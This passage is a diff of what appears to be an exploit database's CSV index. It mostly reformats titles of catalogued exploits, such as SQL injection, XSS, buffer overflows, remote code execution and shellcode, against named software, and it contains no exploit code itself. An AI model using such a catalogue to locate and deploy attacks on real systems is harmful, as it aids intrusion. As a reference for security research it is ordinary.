27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 @@ -24182,13 +24177,13 @@ id,file,description,date,author,platform,type,port 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0 -27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection",2006-01-09,night_warrior771,php,webapps,0 -27060,platforms/php/webapps/27060.txt,"PHP-Nuke News Submission Story Text Field XSS",2006-01-09,night_warrior771,php,webapps,0 +27059,platforms/php/webapps/27059.txt,"Xoops Pool Module - IMG Tag HTML Injection",2006-01-09,night_warrior771,php,webapps,0 +27060,platforms/php/webapps/27060.txt,"PHP-Nuke News Submission Story - Text Field XSS",2006-01-09,night_warrior771,php,webapps,0 27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 27062,platforms/cgi/webapps/27062.txt,"Hummingbird Collaboration Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps,0 27063,platforms/asp/webapps/27063.txt,"WebWiz Forums - Search_form.ASP Cross-Site Scripting",2006-01-10,nukedx,asp,webapps,0 27064,platforms/php/webapps/27064.txt,"Orjinweb - Index.php Remote File Inclusion",2006-01-10,serxwebun,php,webapps,0 -27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 +27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - -c Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27067,platforms/php/webapps/27067.txt,"MyPHPim - calendar.php3 cal_id Parameter SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27068,platforms/php/webapps/27068.txt,"MyPHPim Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24198,7 +24193,7 @@ id,file,description,date,author,platform,type,port 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 -27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 +27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 - Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.ASP Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 @@ -24214,9 +24209,9 @@ id,file,description,date,author,platform,type,port 27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0 27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0 27091,platforms/cgi/webapps/27091.txt,"Ultimate Auction 3.67 - ItemList.PL Cross-Site Scripting",2006-01-16,querkopf,cgi,webapps,0 -27092,platforms/php/webapps/27092.txt,"GTP iCommerce Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 +27092,platforms/php/webapps/27092.txt,"GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 - Index.php Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 -27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 Bluetooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 +27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - Bluetooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27097,platforms/php/webapps/27097.txt,"phpXplorer 0.9.33 - Workspaces.php Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 @@ -24230,7 +24225,7 @@ id,file,description,date,author,platform,type,port 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - login.php username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"phpXplorer 0.9.33 - Action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 -27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 +27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 - blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter XSS",2006-01-18,alex@evuln.com,php,webapps,0 @@ -24266,7 +24261,7 @@ id,file,description,date,author,platform,type,port 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - Login.ASP SQL Injection",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - Forum.ASP Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 -27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 +27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 @@ -24285,7 +24280,7 @@ id,file,description,date,author,platform,type,port 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 27162,platforms/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps,0 -27163,platforms/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin Directory Traversal",2006-02-04,"Timothy D. Morgan",cgi,webapps,0 +27163,platforms/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin - Directory Traversal",2006-02-04,"Timothy D. Morgan",cgi,webapps,0 27164,platforms/php/webapps/27164.txt,"UBB.Threads 6.3 - Showflat.php SQL Injection",2006-01-29,k-otik,php,webapps,0 27165,platforms/php/webapps/27165.txt,"Beehive Forum 0.6.2 - Index.php SQL Injection",2005-12-22,trueend5,php,webapps,0 27166,platforms/php/webapps/27166.txt,"EyeOS 0.8.x - Session Remote Command Execution",2006-02-07,"James Bercegay",php,webapps,0 @@ -24302,8 +24297,8 @@ id,file,description,date,author,platform,type,port 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - Showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 -27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 -27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes Email Subject XSS",2006-02-10,"Jakob Balle",multiple,remote,0 +27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 +27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject XSS",2006-02-10,"Jakob Balle",multiple,remote,0 27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 - show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 @@ -24324,7 +24319,7 @@ id,file,description,date,author,platform,type,port 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - Search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 -27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 +27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - change_password.php Current Password Weakness",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - login.php check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php username Parameter XSS",2006-02-13,"James Bercegay",php,webapps,0 @@ -24333,7 +24328,7 @@ id,file,description,date,author,platform,type,port 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple - Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 -27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 +27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - Search.php Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body XSS",2006-02-14,joffer,php,webapps,0 @@ -24351,7 +24346,7 @@ id,file,description,date,author,platform,type,port 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 -27230,platforms/php/webapps/27230.txt,"My Blog 1.63 BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 +27230,platforms/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0 27232,platforms/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",hardware,dos,0 27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - chopSAPLog.dsp fullName Variable Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 @@ -24368,7 +24363,7 @@ id,file,description,date,author,platform,type,port 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite Weakness",2006-02-16,ReZEN,linux,remote,0 27245,platforms/php/webapps/27245.txt,"V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,linux,dos,0 -27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin HTML Injection",2006-02-18,"marc & shb",php,webapps,0 +27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",php,webapps,0 27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection",2006-02-18,murfie,php,webapps,0 27249,platforms/php/webapps/27249.html,"PHP-Nuke 7.x - CAPTCHA Bypass Weakness",2006-02-18,waraxe,php,webapps,0 27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 - Edituser.php Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24398,7 +24393,7 @@ id,file,description,date,author,platform,type,port 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash PoC",2013-08-02,d3b4g,windows,dos,0 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - (index.php rang param) SQL Injection",2013-08-02,Raw-x,php,webapps,0 -27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 +27275,platforms/php/webapps/27275.txt,"FunGamez - Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 @@ -24427,7 +24422,7 @@ id,file,description,date,author,platform,type,port 27302,platforms/php/webapps/27302.txt,"NOCC 1.0 - html_bottom_table.php Multiple Parameter XSS",2006-02-23,rgod,php,webapps,0 27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 - Index.php SQL Injection",2006-02-23,h4cky0u,php,webapps,0 27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload",2006-02-23,"NSA Group",php,webapps,0 -27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps,0 +27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps,0 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 - jgs_galerie_slideshow.php Multiple Parameter XSS",2006-02-23,nuker,php,webapps,0 27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - Board jgs_galerie_scroll.php userid Parameter XSS",2006-02-23,nuker,php,webapps,0 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - reviews.php letter Parameter XSS",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 @@ -24441,7 +24436,7 @@ id,file,description,date,author,platform,type,port 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow Exploit (SEH)",2013-08-03,sagi-,windows,local,0 27317,platforms/windows/dos/27317.txt,"StarUML WinGraphviz.dll - ActiveX Buffer Overflow",2013-08-03,d3b4g,windows,dos,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 -27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 +27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter XSS",2006-02-25,"Preben Nylokken",hardware,remote,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php username Parameter XSS",2006-02-27,botan,php,webapps,0 @@ -24451,7 +24446,7 @@ id,file,description,date,author,platform,type,port 27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0 27327,platforms/php/webapps/27327.txt,"D3Jeeb Pro 3 - fastlinks.php catid Parameter SQL Injection",2006-02-25,SAUDI,php,webapps,0 27328,platforms/php/webapps/27328.txt,"D3Jeeb Pro 3 - catogary.php catid Parameter SQL Injection",2006-02-25,SAUDI,php,webapps,0 -27329,platforms/windows/dos/27329.txt,"Alt-N MDaemon 8.1.1 -IMAP Server Remote Format String",2006-02-27,Nemesis,windows,dos,0 +27329,platforms/windows/dos/27329.txt,"Alt-N MDaemon 8.1.1 IMAP Server - Remote Format String",2006-02-27,Nemesis,windows,dos,0 27330,platforms/php/webapps/27330.txt,"n8cms 1.1/1.2 - index.php Multiple Parameter SQL Injection",2006-02-27,Liz0ziM,php,webapps,0 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - index.php Multiple Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - mailto.php userid Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 @@ -24476,9 +24471,9 @@ id,file,description,date,author,platform,type,port 27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - index.php submissionstatus Parameter XSS",2006-03-04,Retard,php,webapps,0 27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter XSS",2006-03-04,Retard,php,webapps,0 27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 - displaygame.php gamefile Parameter XSS",2006-03-04,Retard,php,webapps,0 -27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 +27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - Misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 -27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 +27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - Common.php Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - Login.php Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27365,platforms/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service",2006-03-06,"Luigi Auriemma",multiple,dos,0 @@ -24556,8 +24551,8 @@ id,file,description,date,author,platform,type,port 27448,platforms/php/webapps/27448.txt,"phpWebsite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27449,platforms/php/webapps/27449.txt,"phpWebsite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Remote Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 -27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 Haydn.EXE Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 -27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 +27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.EXE Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 +27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 - Status_Image.php Cross-Site Scripting",2006-03-22,kspecial,php,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola Bluetooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 @@ -24568,7 +24563,7 @@ id,file,description,date,author,platform,type,port 27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 -27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 +27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 - APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board - Mb.CGI SQL Injection",2006-03-24,kspecial,cgi,webapps,0 27465,platforms/php/webapps/27465.txt,"VihorDesign - Index.php Cross-Site Scripting",2006-03-24,botan,php,webapps,0 27466,platforms/php/webapps/27466.txt,"VihorDesign - Index.php Remote File Inclusion",2006-03-24,botan,php,webapps,0 @@ -24595,7 +24590,7 @@ id,file,description,date,author,platform,type,port 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 beta - default.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.CGI Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 27489,platforms/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 -27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 Accountlogon.CFM Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 +27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - Accountlogon.CFM Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 27491,platforms/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injection",2006-03-27,r0t,cfm,webapps,0 27492,platforms/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,php,webapps,0 27493,platforms/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 @@ -24625,11 +24620,11 @@ id,file,description,date,author,platform,type,port 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80 27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 -27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 -.BVF File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 +27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 - .BVF File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27526,platforms/windows/remote/27526.txt,"Oracle Java - storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution",2013-08-12,Metasploit,multiple,remote,0 -27529,platforms/php/remote/27529.rb,"OpenX Backdoor PHP Code Execution",2013-08-12,Metasploit,php,remote,0 +27529,platforms/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution",2013-08-12,Metasploit,php,remote,0 27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,Metasploit,multiple,remote,0 27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 @@ -24660,7 +24655,7 @@ id,file,description,date,author,platform,type,port 27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter XSS",2006-04-03,r0t,cgi,webapps,0 27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - mods/calendar/index.cgi vsSD Parameter XSS",2006-04-03,r0t,cgi,webapps,0 27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 -27564,platforms/php/remote/27564.txt,"PHP 4.x/5.0/5.1 PHPInfo Large Input Cross-Site Scripting",2006-04-03,"Maksymilian Arciemowicz",php,remote,0 +27564,platforms/php/remote/27564.txt,"PHP 4.x/5.0/5.1 - PHPInfo Large Input Cross-Site Scripting",2006-04-03,"Maksymilian Arciemowicz",php,remote,0 27565,platforms/windows/remote/27565.txt,"HP Color LaserJet 